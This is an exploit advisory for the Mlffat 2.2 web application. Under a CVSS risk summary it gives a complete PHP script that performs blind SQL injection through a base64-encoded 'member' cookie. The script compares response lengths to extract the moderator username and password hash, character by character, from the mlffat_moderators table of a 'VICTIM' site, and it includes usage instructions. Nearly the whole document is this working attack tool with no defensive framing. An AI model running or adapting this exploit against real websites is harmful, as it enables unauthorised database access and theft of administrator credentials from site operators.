Mlffat 2.2 Remote Blind SQL Injection Exploit

Credit: iqa
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php ini_set("max_execution_time",0); print_r(' [q] Mlffat 2.2 Blind SQL Inj. [q] Cookie <3 [q] By Qabandi From Kuwait, PEACE... iqa[a] [/] -[Tam al tableegh]- | ;) Join the revolution | '); if ($argc<6) { print_r(' ----------------------------------------------------------------------------- Usage: php '.$argv[0].' VICTIM DIR user_id username password --VICTIM == the website that has the script installed. --DIR == Directory of script, /mlffat/ or // for root dir --user_id== Your user ID (you must register) --username= your username --password= your password example: php '.$argv[0].' /demo/ 1 mlffat test or if in root dir: example: php '.$argv[0].' // 1 mlffat test ----------------------------------------------------------------------------- '); die; } function QABANDI($victim,$vic_dir,$user_id,$user_name,$user_pass,$injection){ $host = $victim; $usrid= $user_id; $usrnm= $user_name; $usrpw= $user_pass; $p = "http://".$host.$vic_dir; $user_id_inj = $usrid.$injection; $qookie = base64_encode($user_id_inj.":".$usrnm.":".md5($usrpw)); $packet ="GET ".$p."index.php?action=account&view=editprofile HTTP/1.0\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: member=".$qookie.";\r\n"; $packet.="Connection: Close\r\n\r\n"; // if ($debug == 1){ // print $qookie."\n\n"; // } $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } return $data; } $host1 = $argv[1]; $userdir1=$argv[2]; $userid1= $argv[3]; $username1= $argv[4]; $userpass1= $argv[5]; if ($argc > 2) { echo "\nPlease wait, this will take time, el9abr zain ;)\n"; $r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1")); echo "\nExploiting:\n"; $w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$i.",1))!='0"); $laenge = strlen($q); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".$i)); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".($i-1))); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } // if ($j>9){ // $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i); // } // if ($j<9){ // $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i); // } // if ($j=9){ $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i,1); // } $laenge = strlen($hg); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".($i-1),1)); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>


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